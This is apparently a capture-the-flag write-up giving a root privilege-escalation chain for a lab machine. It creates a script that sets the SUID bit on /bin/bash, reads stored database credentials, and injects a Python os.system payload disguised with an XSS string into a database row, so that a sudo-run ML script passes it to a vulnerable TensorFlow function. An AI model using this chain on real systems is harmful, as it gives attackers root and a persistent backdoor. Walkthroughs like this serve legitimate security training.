For root:
First get two ssh sessions.
Create the /dev/shm/lol.sh script. Something like this:
#!/bin/bash
chmod +s /bin/bash
Don't forget to make is executable.
Read the database creds from /opt/security/ml_security.py and log in to the database. Run these:
use app;
insert into escalate values ("lol","lol","lol",'hello=exec("""
import os
os.system("/dev/shm/lol.sh")
print("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');
On the second session just run:
sudo /opt/security/ml_security.py
And the /dev/shm/lol.sh should get run by root.
To explain it shortly:
The python script basically checks the reasons from escalate table in the database for xss using machine learning. If they get a score higher then .5, they get passed to preprocess_input_exprs_arg_string function which is vulnerable in tensorflow < 2.6.4, (the box has 2.6.3): https://github.com/advisories/GHSA-75c9-jrh4-79mc
Hence, all the stuff in the print function to make it pass the test.